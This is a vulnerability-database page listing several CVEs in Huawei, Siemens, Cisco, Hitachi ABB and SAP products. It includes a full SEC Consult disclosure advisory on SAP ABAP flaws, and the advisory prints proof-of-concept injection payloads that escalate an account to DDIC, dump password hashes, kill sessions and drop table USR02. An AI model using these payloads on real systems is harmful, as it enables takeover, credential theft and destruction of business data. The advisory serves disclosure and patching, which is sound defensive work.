VARIoT IoT vulnerabilities database


VAR-202107-1226 CVE-2021-35527 Hitachi ABB Power Grids eSOMS: credentials are not adequately protected
CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
A password autocomplete vulnerability in the web application password field of Hitachi ABB Power Grids eSOMS allows an attacker to gain access to user credentials that are stored by the browser. This issue affects Hitachi ABB Power Grids eSOMS version 6.3 and prior versions (CWE-522, CVE-2021-35527). A third party who has compromised the system, or who exploits a cross-site scripting (XSS) vulnerability in another application, may steal the stored password information. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. eSOMS is a shift operations management system for the power generation industry.
VAR-202107-0362 CVE-2021-22399 Vulnerability in multiple Huawei smartphones
CVSS V2: 2.1
CVSS V3: 5.5
Severity: MEDIUM
The Bluetooth function of some Huawei smartphones has a DoS vulnerability. Attackers can install third-party apps to send specific broadcasts, causing the Bluetooth module to crash. Successful exploitation of this vulnerability causes the Bluetooth function to become abnormal. Affected product versions include: HUAWEI P30 10.0.0.195(C432E22R2P5), 10.0.0.200(C00E85R2P11), 10.0.0.200(C461E6R3P1), 10.0.0.201(C10E7R5P1), 10.0.0.201(C185E4R7P1), 10.0.0.206(C605E19R1P3), 10.0.0.209(C636E6R3P4), 10.0.0.210(C635E3R2P4), and versions earlier than 10.1.0.165(C01E165R2P11). Multiple Huawei smartphones contain an unspecified vulnerability that may result in a denial-of-service (DoS) condition. Huawei P30 is a smartphone from China's Huawei. Huawei P30 contains an input validation error vulnerability, which stems from a flaw in the product's Bluetooth module when processing broadcast data. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements.
VAR-202107-0370 CVE-2021-22440 Path traversal vulnerability in multiple Huawei products
CVSS V2: 2.1
CVSS V3: 4.6
Severity: MEDIUM
There is a path traversal vulnerability in some Huawei products. The vulnerability is due to the software using external input to construct a pathname that is intended to identify a file or directory located underneath a restricted parent directory, without properly validating the pathname. Successful exploitation could allow the attacker to access a location outside of the restricted directory by means of a crafted filename. Affected product versions include: HUAWEI Mate 20 9.0.0.195(C01E195R2P1), 9.1.0.139(C00E133R3P1); HUAWEI Mate 20 Pro 9.0.0.187(C432E10R1P16), 9.0.0.188(C185E10R2P1), 9.0.0.245(C10E10R2P1), 9.0.0.266(C432E10R1P16), 9.0.0.267(C636E10R2P1), 9.0.0.268(C635E12R1P16), 9.0.0.278(C185E10R2P1); Hima-L29C 9.0.0.105(C10E9R1P16), 9.0.0.105(C185E9R1P16), 9.0.0.105(C636E9R1P16); Laya-AL00EP 9.1.0.139(C786E133R3P1); OxfordS-AN00A 10.1.0.223(C00E210R5P1); Tony-AL00B 9.1.0.257(C00E222R2P1). There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements.
VAR-202107-1338 CVE-2021-31894 Improper assignment of permissions to critical resources in multiple Siemens products
CVSS V2: 7.2
CVSS V3: 8.8
Severity: HIGH
A vulnerability has been identified in SIMATIC PCS 7 V8.2 and earlier (All versions), SIMATIC PCS 7 V9.X (All versions < V9.1 SP2), SIMATIC PDM (All versions < V9.2 SP2), SIMATIC STEP 7 V5.X (All versions < V5.7), SINAMICS STARTER (containing STEP 7 OEM version) (All versions < V5.4 SP2 HF1). A directory containing metafiles relevant to devices' configurations has write permissions. An attacker could leverage this vulnerability by changing the content of certain metafiles and subsequently manipulate parameters or behavior of devices that would later be configured by the affected software. Multiple Siemens products are vulnerable to improper assignment of permissions to critical resources; information may be disclosed or tampered with, and a denial-of-service (DoS) condition may result. Siemens SIMATIC PCS 7 is a process control system from Siemens of Germany. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements.
VAR-202106-0705 CVE-2021-21473 SAP NetWeaver AS for ABA and ABAP Platform: missing authorization check
CVSS V2: 6.5
CVSS V3: 6.3
Severity: MEDIUM
SAP NetWeaver AS ABAP and ABAP Platform, versions 700, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, contain the function module SRM_RFC_SUBMIT_REPORT, which fails to validate the authorization of an authenticated user, thus allowing an unauthorized user to execute reports in SAP NetWeaver ABAP Platform. SAP NetWeaver AS for ABA and ABAP Platform lack a proper authorization check; information may be disclosed or tampered with, and a denial-of-service (DoS) condition may result. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements.

SEC Consult Vulnerability Lab Security Advisory < 20220518-0 >
=======================================================================
              title: Multiple Critical Vulnerabilities
            product: SAP® Application Server ABAP and ABAP® Platform
                     (Different Software Components)
 vulnerable version: see section "Vulnerable / tested versions"
      fixed version: see SAP security notes 2958563, 2973735, 2993132,
                     2986980, 2999854, 3002517, 3048657
         CVE number: CVE-2020-6318, CVE-2020-26808, CVE-2020-26832,
                     CVE-2021-21465, CVE-2021-21468, CVE-2021-21466,
                     CVE-2021-21473, CVE-2021-33678
             impact: critical
           homepage: https://www.sap.com
              found: 08/2020 - 02/2021
                 by: Fabian Hagg (Office Vienna)
                     Alexander Meier (Office Berlin)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult, an Atos company
                     Europe | Asia | North America

                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"SAP is a market share leader in enterprise resource planning (ERP), analytics, supply chain management, human capital management, master data management, data integration as well as in experience management" [1]. Customers comprise 92% of the Forbes Global 2000 companies and 98% of the 100 most valued brands.
77% of the world's transaction revenue touches an SAP system [1, 2].

"SAP NetWeaver Application Server for ABAP (AS ABAP) is a platform on which important business processes run. It provides a complete development and runtime environment for ABAP-based applications. The purpose of AS ABAP is to provide programmers with an efficient means of expressing business logic and relieve them from the necessity of platform-related and purely technical coding. AS ABAP is therefore a basis for all ABAP systems" [3].

"The [successor] ABAP platform provides a reliable and scalable server and programming environment for modern ABAP development [...]. The ABAP platform offers support for SAP HANA and SAP Fiori and allows developers to efficiently build enterprise software that meets the requirements of their business scenarios – on-premise as well as in the cloud" [4].

[1] https://www.sap.com/about/company.html
[2] https://www.sap.com/documents/2017/04/4666ecdd-b67c-0010-82c7-eda71af511fa.html
[3] https://help.sap.com/viewer/ff18034f08af4d7bb33894c2047c3b71/7.52.5/en-US/797de8aa42e24916953c4bb3d983662d.html
[4] https://developers.sap.com/topics/abap-platform.html

Business recommendation:
------------------------
By exploiting the vulnerabilities documented in this advisory, privileged attackers can take complete control of affected application servers. Thus, successful exploitation can enable fraud, sabotage or data theft while affecting confidentiality, integrity, and availability of business data.

SEC Consult recommends implementing security notes 2958563, 2973735, 2993132, 2986980, 2999854, 3002517, 3048657, in which the documented issues are fixed according to the vendor. We advise installing the corrections as a matter of priority to keep business-critical data secured.

Vulnerability overview/description:
-----------------------------------
Advanced Business Application Programming (ABAP)® is a proprietary programming language by SAP SE. In common with every other programming language, ABAP can be susceptible to software vulnerabilities ranging from missing or improper authorization checks to inadequate input validation and output sanitization. Of particular concern are injection vulnerabilities, which can jeopardize the overall system security.

Remote Function Call (RFC) is a proprietary network protocol by SAP SE. Comparable to application programming interfaces (APIs), SAP systems come with thousands of built-in function modules implemented in ABAP. RFC allows remote-enabled functions to be accessed via the network. This makes it possible to decentralize business applications even across system boundaries. External programs and external clients can make use of RFC connections to interact with an SAP system via libraries (e.g. NW RFC SDK) provisioned by SAP SE.

This advisory covers multiple critical vulnerabilities discovered in the ABAP® coding of standard function modules. These are part of different software components that build upon the bedrock products SAP® Application Server ABAP and ABAP® Platform.

1) [CVE-2020-6318] Code Injection Vulnerability in SAP NetWeaver (ABAP Server) and ABAP Platform
Function modules RSDU_LIST_DB_TABLE_SYB and RSDU_LIST_DB_TABLE_DB4 of function groups RSDU_UTIL_SYB and RSDU_CORE_UTIL_DB4 are vulnerable to ABAP code injection bugs that allow execution of arbitrary ABAP code. Successful exploitation leads to full system compromise.

2) [CVE-2020-26808] Code Injection Vulnerability in SAP AS ABAP and S/4 HANA (DMIS)
Function module CNV_MBT_SEL_STRING_RETURN of function group CNV_MBT_SEL is vulnerable to an ABAP code injection bug that allows arbitrary code to be embedded into the ABAP Repository. An attacker can abuse this bug by invoking the function remotely via the RFC protocol. Successful exploitation leads to full system compromise.

3) [CVE-2020-26832] Missing Authorization Check in SAP NetWeaver AS ABAP and SAP S4 HANA (SAP Landscape Transformation)
Function module CNV_GET_USERS_FOR_APP_SERVER of function group CNV_00001_HELP does not perform any programmatically implemented authorization check. An attacker can abuse this bug by invoking the function remotely via the RFC protocol. Successful exploitation allows an attacker to retrieve internal information and to make a targeted SAP system completely unavailable to its intended users. The latter is to be considered a Denial of Service (DoS) attack.

4) [CVE-2021-21468] Missing Authorization Check in SAP Business Warehouse (Database Interface)
Function module RSDL_DB_GET_DATA_BWS of function group RSDL does not perform any programmatically implemented authorization check. An attacker can abuse this bug by invoking the function remotely via the RFC protocol. Successful exploitation allows an attacker to read out the entire database, including cross-client data access.

5) [CVE-2021-21465] Native SQL Injection Vulnerability in SAP Business Warehouse (Database Interface)
Function module RSDL_DB_GET_DATA_BWS of function group RSDL is vulnerable to a native SQL injection (ADBC) bug that allows execution of arbitrary SQL commands at database level. An attacker can abuse this bug by invoking the function remotely via the RFC protocol. Successful exploitation leads to full system compromise.

6) [CVE-2021-21466] Code Injection Vulnerability in SAP Business Warehouse and SAP BW/4HANA
Function module RSDRI_DF_TEXT_READ of function group RSDRI_DF_FACADE is vulnerable to an ABAP code injection bug that allows arbitrary code to be embedded into the ABAP Repository. An attacker can abuse this bug by invoking the function remotely via the RFC protocol. Successful exploitation leads to full system compromise.

7) [CVE-2021-21473] Missing Authorization Check in SAP NetWeaver AS ABAP and ABAP Platform
Function module SRM_RFC_SUBMIT_REPORT does not perform any programmatically implemented authorization check. An attacker can abuse this bug by invoking the function remotely via the RFC protocol.
Successful exploitation allows an attacker to execute existing ABAP reports without holding sufficient authorizations.

8) [CVE-2021-33678] Code Injection vulnerability in SAP NetWeaver AS ABAP (Reconciliation Framework)
Function module CONVERT_FROM_CHAR_SORT_RFW of function group FG_RFW contains a code injection vulnerability with a limited exploitation primitive. An attacker can abuse this bug to delete critical system tables (e.g. USR02), making the targeted SAP system completely unavailable to its intended users.

Proof of concept:
-----------------
1) [CVE-2020-6318] Code Injection Vulnerability in SAP NetWeaver (ABAP Server) and ABAP Platform
The vulnerable functions make use of the GENERATE SUBROUTINE POOL instruction by providing source code that is created dynamically using untrusted user input. As there is no input validation or output sanitization, an attacker can inject malicious ABAP code through specific import parameters. This code gets executed on the fly by the application server in the course of execution of the functions.

The following payload exploits the bug to escalate privileges via reference user assignment:

Import Parameter: I_TABLNM
Value: USR02

Import Table: I_T_SELECT_FIELDS
╒═══════════════╕
│ RSD_FIELDNM   │
╞═══════════════╡
│ BNAME         │
╘═══════════════╛

Import Table: I_T_WHERE_COND
╒═════════╤════╤════════════════════════════════════════════╕
│ FIELDNM │ OP │ LOW                                        │
╞═════════╪════╪════════════════════════════════════════════╡
│ BNAME   │ EQ │ S'ENDEXEC. EXEC SQL.UPDATE USREFUS SET     │
│         │    │ REFUSER = 'DDIC' WHERE BNAME = 'ATTACKER   │
╘═════════╧════╧════════════════════════════════════════════╛

2) [CVE-2020-26808] Code Injection Vulnerability in SAP AS ABAP and S/4 HANA (DMIS)
The vulnerable function makes use of the INSERT REPORT instruction by providing source code that is created dynamically using untrusted user input. As there is no input validation or output sanitization, an attacker can inject malicious ABAP code through specific import parameters. Inserted code may be executed by chaining this bug with CVE-2021-21473.

The following payload exploits the bug to escalate privileges via reference user assignment:

Import Parameter: TABNAME
Value: USR02

Import Table: IMT_SELSTRING
╒══════════════════════════════════════════════════════════════╕
│ LINE                                                         │
╞══════════════════════════════════════════════════════════════╡
│ BNAME = 'TEST'. ENDSELECT.                                   │
├──────────────────────────────────────────────────────────────┤
│ UPDATE USREFUS SET REFUSER = 'DDIC' WHERE BNAME = 'ATTACKER' │
├──────────────────────────────────────────────────────────────┤
│ SELECT * FROM USR02                                          │
╘══════════════════════════════════════════════════════════════╛

3) [CVE-2020-26832] Missing Authorization Check in SAP NetWeaver AS ABAP and SAP S4 HANA (SAP Landscape Transformation)
The vulnerable function does not perform any explicit authorization check. Depending on a specific import parameter, the function leaks active logon sessions (opcode 02) or terminates all active logon sessions (opcode 25) by kernel call 'ThUsrInfo'. Invoking the function periodically prevents users from logging into the application server.
The following payload exploits the bug to trigger the information disclosure and enumerate active user sessions:

Import Parameter: MODE
Value: 1

The following payload exploits the bug to terminate all active user sessions:

Import Parameter: MODE
Value: 2

4) [CVE-2021-21468] Missing Authorization Check in SAP Business Warehouse (Database Interface)
The vulnerable function does not perform any explicit authorization check. It uses predefined classes and methods from the ABAP Database Connectivity (ADBC) framework to execute native SQL queries at database level. Depending on specific import parameters, this allows arbitrary table data to be read out, including user master records or secure storages (e.g. RSECTAB).

The following payload exploits the bug to exfiltrate user password hashes:

Import Table: I_S_TABSEL
╒═════════════════════════════════════════════╕
│ NAME                                        │
╞═════════════════════════════════════════════╡
│ USR02                                       │
╘═════════════════════════════════════════════╛

Import Table: I_S_DBCON
╒═════════════════════════════════════════════╕
│ CON_NAME                                    │
╞═════════════════════════════════════════════╡
│ <Database Connection String> (e.g. DEFAULT) │
╘═════════════════════════════════════════════╛

Import Table: I_T_DBFIELDS
╒═══════════════╤═════════╤════════╕
│ NAME          │ TYPE    │ LENGTH │
╞═══════════════╪═════════╪════════╡
│ BNAME         │ CHAR255 │ 000255 │
├───────────────┼─────────┼────────┤
│ PWDSALTEDHASH │ CHAR255 │ 000255 │
╘═══════════════╧═════════╧════════╛

5) [CVE-2021-21465] Native SQL Injection Vulnerability in SAP Business Warehouse (Database Interface)
The vulnerable function does not perform any input validation or output sanitization on import parameters that can be used to define conditional SQL statements. This allows arbitrary SQL commands to be injected that get executed natively at database level in the course of execution of the function.

The following payload exploits the bug to escalate privileges via reference user assignment:

Import Table: I_S_TABSEL
╒═════════════════════════════════════════════╕
│ NAME                                        │
╞═════════════════════════════════════════════╡
│ USR02                                       │
╘═════════════════════════════════════════════╛

Import Table: I_S_DBCON
╒═════════════════════════════════════════════╕
│ CON_NAME                                    │
╞═════════════════════════════════════════════╡
│ <Database Connection String> (e.g. DEFAULT) │
╘═════════════════════════════════════════════╛

Import Table: I_T_DBFIELDS
╒═══════════════╤═════════╤════════╕
│ NAME          │ TYPE    │ LENGTH │
╞═══════════════╪═════════╪════════╡
│ BNAME         │ CHAR255 │ 000255 │
╘═══════════════╧═════════╧════════╛

Import Table: I_T_SELECT
╒══════════════════════╤════════╤══════════════════════════════╕
│ FIELDNM              │ OPTION │ LOW                          │
╞══════════════════════╪════════╪══════════════════════════════╡
│ BNAME                │ EQ     │ '';UPDATE USREFUS SET REFUSER│
│                      │        │ ='DDIC' WHERE '1             │
├──────────────────────┼────────┼──────────────────────────────┤
│ ' = '1 AND' AND BNAME│ EQ     │ 'ATTACKER';                  │
╘══════════════════════╧════════╧══════════════════════════════╛

6) [CVE-2021-21466] Code Injection Vulnerability in SAP Business Warehouse and SAP BW/4HANA
The vulnerable function makes use of the INSERT REPORT instruction by providing source code that is created dynamically using untrusted user input. As there is no input validation or output sanitization, an attacker can inject malicious ABAP code through specific import parameters. Inserted code may be executed by chaining this bug with CVE-2021-21473.
The following payload exploits the bug to escalate privileges via reference user assignment:

Import Parameter: I_TABLE_NAME
Value: INJECTION

Import Parameter: I_DEBUG_SUFFIX
Value: SAP

Import Table: I_T_RANGE_STRING
╒═══════╤═════════════════════════════════════╤════════════╕
│ CHANM │ LOW                                 │ HIGH       │
╞═══════╪═════════════════════════════════════╪════════════╡
│ BNAME │ '. UPDATE USREFUS SET REFUSER       │ '. EXIT. " │
│       │ = 'DDIC' WHERE BNAME = 'ATTACKER    │            │
╘═══════╧═════════════════════════════════════╧════════════╛

7) [CVE-2021-21473] Missing Authorization Check in SAP NetWeaver AS ABAP and ABAP Platform
The vulnerable function uses a dynamically generated program name (based on data from untrusted sources) in a SUBMIT call. No authorization checks are programmatically enforced. Thus, a remote, unauthorized attacker can leverage this function to start any existing ABAP report by providing the respective report name in the import parameter REPORTNAME.

8) [CVE-2021-33678] Code Injection vulnerability in SAP NetWeaver AS ABAP (Reconciliation Framework)
The vulnerable function makes use of the GENERATE SUBROUTINE POOL instruction in form 'get_dynamic_fields' by providing source code that is created dynamically using untrusted user input. As there is no input validation or output sanitization, an attacker can inject malicious ABAP code through specific import parameters. These parameters are limited in size due to their variable type. This restricts an attacker in exploitation scenarios. However, it is still possible, for example, to delete critical system tables by exploiting this bug.

The following payload exploits the bug to drop table USR02, leading to a complete loss of availability of the target system:

Import Parameter: RTABNAME
Value: X. EXEC SQL. DROP TABLE USR02-

Import Parameter: RFIELDNAME
Value: ENDEXEC

Vulnerable / tested versions:
-----------------------------
All tests were conducted on SAP NetWeaver Application Server ABAP 752 SP04 and ABAP Platform 1909. No additional testing on other releases has been carried out.

According to the vendor the following releases and versions are affected by the discovered vulnerabilities:

1) SAP NetWeaver (ABAP Server) and ABAP Platform, Versions - 700, 701, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755
   Components: SAP_BW, SAP_BW_VIRTUAL_COMP

2) SAP AS ABAP (DMIS), Versions - 2011_1_620, 2011_1_640, 2011_1_700, 2011_1_710, 2011_1_730, 2011_1_731, 2011_1_752, 2020; SAP S4 HANA (DMIS), Versions - 101, 102, 103, 104, 105
   Components: DMIS, S4CORE

3) SAP NetWeaver AS ABAP (SAP Landscape Transformation - DMIS), Versions - 2011_1_620, 2011_1_640, 2011_1_700, 2011_1_710, 2011_1_730, 2011_1_731, 2011_1_752, 2020; SAP S4 HANA (SAP Landscape Transformation), Versions - 101, 102, 103, 104, 105
   Components: DMIS, S4CORE

4) SAP Business Warehouse, Versions - 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, 782
   Components: SAP_BW, SAP_BW_VIRTUAL_COMP

5) SAP Business Warehouse, Versions - 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, 782
   Components: SAP_BW, SAP_BW_VIRTUAL_COMP

6) SAP Business Warehouse, Versions - 700, 701, 702, 711, 730, 731, 740, 750, 782; SAP BW4HANA, Versions - 100, 200
   Components: SAP_BW, DW4CORE

7) SAP NetWeaver AS ABAP and ABAP Platform, Versions - 700, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755
   Components: SAP_BASIS

8) SAP NetWeaver AS ABAP (Reconciliation Framework) - 700, 701, 702, 710, 711, 730, 731, 740, 750, 751, 752, 75A, 75B, 75B, 75C, 75D, 75E, 75F
   Components: SAP_ABA

Vendor contact timeline:
------------------------
The following timelines have been split for each CVE/vulnerability, as different contacts were responsible.
All identified vulnerabilities have been fixed by now by SAP, and SEC Consult releases this security advisory adhering to the responsible disclosure policy.

CVE-2020-6318
--------------------------------
2020-08-12 | Contacting vendor with detailed report through vulnerability submission web form.
2020-08-13 | Vendor confirms receipt and assigns security incident number #2080354772.
2020-08-19 | Vendor confirms vulnerability.
2020-08-24 | Vendor informs about patch development strategy.
2020-09-07 | Vendor informs about release of the patch, registration of CVE number and corresponding security note.
2020-09-08 | Vendor releases patch with SAP Security Note 2958563.

CVE-2020-26808
--------------------------------
2020-09-24 | Contacting vendor with detailed report through vulnerability submission web form.
2020-09-25 | Vendor confirms receipt and assigns security incident number #2070354293.
2020-10-20 | Contacting vendor to request progress information.
2020-10-21 | Vendor confirms vulnerability and states that a fix is in development.
2020-11-09 | Vendor informs about release of the patch, registration of CVE number and corresponding security note.
2020-11-10 | Vendor releases patch with SAP Security Note 2973735.

CVE-2020-26832
--------------------------------
2020-10-23 | Contacting vendor with detailed report through vulnerability submission web form.
2020-10-26 | Vendor confirms receipt and assigns security incident number #2070432866.
2020-11-17 | Vendor confirms vulnerability and proposes CVSS score of 7.6.
2020-11-23 | Vendor asks for exploit script shown in the initial report.
2020-11-24 | Providing the requested script via encrypted PGP mail.
2020-12-07 | Vendor informs about release of the patch, registration of CVE number and corresponding security note.
2020-12-08 | Vendor releases patch with SAP Security Note 2993132.

CVE-2021-21465 / CVE-2021-21468
--------------------------------
2020-10-27 | Contacting vendor with detailed report through vulnerability submission web form.
2020-10-29 | Vendor confirms receipt and assigns separate security incident numbers #2070446047 and #2070446050.
2020-11-06 | Vendor confirms vulnerability and predicts patches to be released on December Patch Tuesday 2020.
2020-11-18 | Vendor confirms that they are still on track for December Patch Tuesday 2020.
2020-12-01 | Vendor informs that patch needs to be postponed to January Patch Tuesday 2021.
2021-01-08 | Vendor informs about release of patches and clarifies that a single security note will fix both issues. Additional information about CVSS scores is provided.
2021-01-11 | Vendor informs about release of the patches, registration of CVE numbers and corresponding security note.
2021-01-12 | Vendor releases patches with SAP Security Note 2986980.

CVE-2021-21466 / CVE-2021-21473
--------------------------------
2020-11-25 | Contacting vendor with detailed report through vulnerability submission web form.
2020-11-27 | Vendor confirms receipt and assigns security incident number #2080396648.
2021-01-04 | Vendor confirms vulnerability and states that they are working on a fix. Additional information is provided detailing that they will split the reported finding into two separate security issues and security incident numbers #2080396648 and #2080412695.
2021-01-11 | Vendor informs about release of the first patch, registration of CVE number and corresponding security note.
2021-01-11 | Vendor informs about patch release for the first issue. Additional information is provided describing that a patch for the second issue is still in development.
2021-01-12 | Vendor releases first patch with SAP Security Note 2999854.
2021-05-07 | Asking vendor for update regarding the second issue.
2021-05-11 | Vendor informs that fix is in progress and note will be released soon.
2021-06-07 | Vendor informs about release of the second patch, registration of CVE number and corresponding security note.
2021-06-08 | Vendor releases second patch with SAP Security Note 3002517.

CVE-2021-33678
--------------------------------
2021-02-01 | Contacting vendor with detailed report through vulnerability submission web form.
2021-02-03 | Vendor confirms receipt and assigns security incident number #2180074995.
2021-05-07 | Asking vendor for update.
2021-05-11 | Vendor informs that fix is in progress.
2021-07-12 | Vendor informs about release of the patch, registration of CVE number and corresponding security note.
2021-07-13 | Vendor releases patch with SAP Security Note 3048657.

Solution:
---------
SAP SE reacted promptly to our findings. The Product Security Incident Response Team (PSRT) and engineers released patches in a timely manner for each of the reported issues. These patches are available in the form of SAP Security Notes, which can be accessed via the SAP Customer Launchpad [5]. More information can also be found at the official SAP Product Security Response Space [6].

The following Security Notes need to be implemented: 2958563, 2973735, 2993132, 2986980, 2999854, 3002517, 3048657

[5] https://launchpad.support.sap.com/#/securitynotes
[6] https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day

Workaround:
-----------
None

Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab
SEC Consult, an Atos company
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker.
The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendations about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Interested to work with the experts of SEC Consult? Send us your application: https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices: https://sec-consult.com/contact/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF F. Hagg, A. Meier / @2022
VAR-202107-1608 CVE-2020-28400 Allocation of resources without limits or throttling in multiple Siemens products
CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
Affected devices contain a vulnerability that allows an unauthenticated attacker to trigger a denial-of-service condition. The vulnerability can be triggered if a large number of DCP reset packets are sent to the device. Multiple Siemens products allocate resources without restrictions or throttling, which may result in a denial-of-service (DoS) condition. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. Siemens SCALANCE S602 is an industrial security appliance from Siemens of Germany. Multiple Siemens products contain a security vulnerability that allows an attacker to carry out a denial-of-service attack. The following products and versions are affected: Development/Evaluation Kits for PROFINET IO: DK Standard Ethernet Controller (All versions), Development/Evaluation Kits for PROFINET IO: EK-ERTEC 200 (All versions), Development/Evaluation Kits for PROFINET IO: EK-ERTEC 200P (All versions), RUGGEDCOM RM1224 (All Versions < 6.4), SCALANCE M-800 (All Versions < 6.4), SCALANCE S615 (All Versions < 6.4), SCALANCE W1700 IEEE 802.11ac (All versions), SCALANCE W700 IEEE 802.11n (All versions), SCALANCE X200-4 P IRT (All Versions < V5.5.0), SCALANCE X201-3P IRT (All Versions < V5.5.0), SCALANCE X201-3P IRT PRO (All Versions < V5.5.0), SCALANCE X202-2 IRT (All Versions < V5.5.0), SCALANCE X202-2P IRT (incl. SIPLUS NET variant) (All Versions < V5.5.0), SCALANCE X202-2P IRT PRO (All Versions < V5.5.0), SCALANCE X204 IRT (All Versions < V5.5.0), SCALANCE X204 IRT PRO (All Versions < V5.5.0), SCALANCE X204-2 (incl. SIPLUS NET variant) (All versions), SCALANCE X204-2FM (All versions), SCALANCE X204-2LD (incl. SIPLUS NET variant) (All versions), SCALANCE X204-2LD TS (All versions), SCALANCE X204-2TS (All versions), SCALANCE X206-1 (All versions), SCALANCE X206-1LD (incl. SIPLUS NET variant) (All versions), SCALANCE X208 (incl. 
SIPLUS NET variant) (All versions), SCALANCE X208PRO (All versions), SCALANCE X212-2 (All versions), SCALANCE X212-2LD (All versions), SCALANCE X216 (All versions), SCALANCE X224 (All versions), SCALANCE X302-7EEC (All versions), SCALANCE X304-2FE (All versions), SCALANCE X306-1LDFE (All versions), SCALANCE X307-2EEC (All versions), SCALANCE X307-3 (All versions), SCALANCE X307-3LD (All versions), SCALANCE X308-2 (incl. SIPLUS NET variant) (All versions), SCALANCE X308-2LD (All versions), SCALANCE X308-2LH (All versions), SCALANCE X308-2LH+ (All versions), SCALANCE X308-2M (All versions), SCALANCE X308-2M POE (All versions), SCALANCE X308-2M TS (All versions), SCALANCE X310 (All versions), SCALANCE X310FE (All versions), SCALANCE X320-1FE (All versions), SCALANCE X320-3LDFE (All versions), SCALANCE XB-200 (All versions), SCALANCE XC-200 (All versions), SCALANCE XF-200BA (All versions), SCALANCE XF201-3P IRT (All Versions < V5.5.0), SCALANCE XF202-2P IRT (All Versions < V5.5.0), SCALANCE XF204 (All versions), SCALANCE XF204 IRT (All Versions < V5.5.0), SCALANCE XF204-2 (incl. 
SIPLUS NET variant) (All versions), SCALANCE XF204-2BA IRT (All Versions < V5.5.0), SCALANCE XF206-1 (All versions), SCALANCE XF208 (All versions), SCALANCE XM400 (All versions < V6.3.1), SCALANCE XP-200 (All versions), SCALANCE XR-300WG (All versions), SCALANCE XR324-12M (All versions), SCALANCE XR324-12M TS (All versions), SCALANCE XR324-4M EEC (All versions), SCALANCE XR324-4M POE (All versions), SCALANCE XR324-4M POE TS (All versions), SCALANCE XR500 (All versions < V6.3.1), SIMATIC CFU PA (All versions), SIMATIC IE/PB-LINK V3 (All versions), SIMATIC MV500 family (All versions < V3.0), SIMATIC NET CM 1542-1 (All versions), SIMATIC NET CP1616/CP1604 (All Versions >= V2.7), SIMATIC NET CP1626 (All versions), SIMATIC NET DK-16xx PN IO (All Versions >= V2.7), SIMATIC PROFINET Driver (All versions), SIMATIC Power Line Booster PLB, Base Module (MLFB: 6ES7972-5AA10-0AB0) (All versions), SIMATIC S7-1200 CPU family (incl. SIPLUS variants) (All Versions < V4.5), SIMOCODE proV Ethernet/IP (All versions < V1.1.3), SIMOCODE proV PROFINET (All versions < V2.1.3), SOFTNET-IE PNIO (All versions)
VAR-202105-0641 CVE-2021-1513 Cisco SD-WAN Software input validation vulnerability CVSS V2: 7.8
CVSS V3: 7.5
Severity: HIGH
A vulnerability in the vDaemon process of Cisco SD-WAN Software could allow an unauthenticated, remote attacker to cause a device to reload, resulting in a denial of service (DoS) condition. This vulnerability is due to insufficient handling of malformed packets. An attacker could exploit this vulnerability by sending crafted traffic to an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition. Cisco SD-WAN Software contains an input validation vulnerability and may be put into a denial-of-service (DoS) state. Cisco SD-WAN vManage is Cisco software that provides software-defined networking functions; it is a form of network virtualization.
VAR-202105-0640 CVE-2021-1512 Cisco SD-WAN Software files or directories accessible to external parties vulnerability CVSS V2: 3.6
CVSS V3: 6.0
Severity: MEDIUM
A vulnerability in the CLI of Cisco SD-WAN Software could allow an authenticated, local attacker to overwrite arbitrary files in the underlying file system of an affected system. This vulnerability is due to insufficient validation of the user-supplied input parameters of a specific CLI command. An attacker could exploit this vulnerability by issuing that command with specific parameters. A successful exploit could allow the attacker to overwrite the content of any arbitrary file that resides on the underlying host file system. Cisco SD-WAN vManage is Cisco software that provides software-defined networking functions; it is a form of network virtualization.
VAR-202108-0287 CVE-2021-22357 Input validation vulnerability in multiple Huawei products CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
There is a denial of service vulnerability in Huawei products. A module cannot deal with specific messages because it validates inputs insufficiently. Attackers can exploit this vulnerability by sending specific messages to the affected module, which can cause a denial of service. Affected product versions include: S12700 V200R013C00SPC500, V200R019C00SPC500; S5700 V200R013C00SPC500, V200R019C00SPC500; S6700 V200R013C00SPC500, V200R019C00SPC500; S7700 V200R013C00SPC500, V200R019C00SPC500. Multiple Huawei products contain an input validation vulnerability and may be put into a denial-of-service (DoS) state. Huawei S12700 is an enterprise-class switch from Huawei of China.
VAR-202108-2236 CVE-2020-28397 Improper authorization vulnerability in multiple Siemens products CVSS V2: 5.0
CVSS V3: 5.3
Severity: MEDIUM
